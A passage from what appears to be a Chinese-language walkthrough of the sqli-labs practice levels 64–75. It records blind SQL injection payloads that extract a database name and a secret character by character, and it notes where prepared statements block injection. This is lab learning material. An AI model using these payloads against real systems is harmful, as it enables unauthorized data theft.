  5. ?id=1 and ascii(substr((select secret_IU8C from challenges.XVCQ5S72H0),1,1))=114 得出:rNlAiMP1PMtH............

less-65

  1. ?id=1")

  2. ?id=1") and ascii(substr(database(),1,1))=99 --+ 回显(challenges:c)

less-66

  1. 空白页面

  2. ?id=1 显示:Array ( [username] => Dumb [0] => Dumb )

  3. ?id=1 '、"、)、')、")、))页面均没有反应

  4. ?id=1 or 1=2 ?id=1 or 1=1 ?id=1 and 1=1 ?id=1 and 1=2 也没反应

  5. 查看源代码: prepare("select username from users where id=?") 对查询语句进行了预编译,似乎无法进行SQL注入

less-67

  1. 是一个index of的目录结构界面

  2. 选择part-1

    1. 是一个登录界面 Username: Password: Array ( [0] =>  [@uid] =>  )

    2. Username:dumb Password:dumb Array ( [0] =>1  [@uid] =>1  )

    3. 查询用户的uid编码。。。

  3. part-2是一个登录界面

    1. Username: Password:

    2. Username:dumb Password:dumb 提交后 Username: Password: Welcome.

    3. 错误提交显示:Invalid password.

  4. 源代码中同样进行预编译,似乎无法进行SQL注入

less-68-75

无此页面


标签:

sql-lab通关的评论 (共 条)

分享到微博请遵守国家法律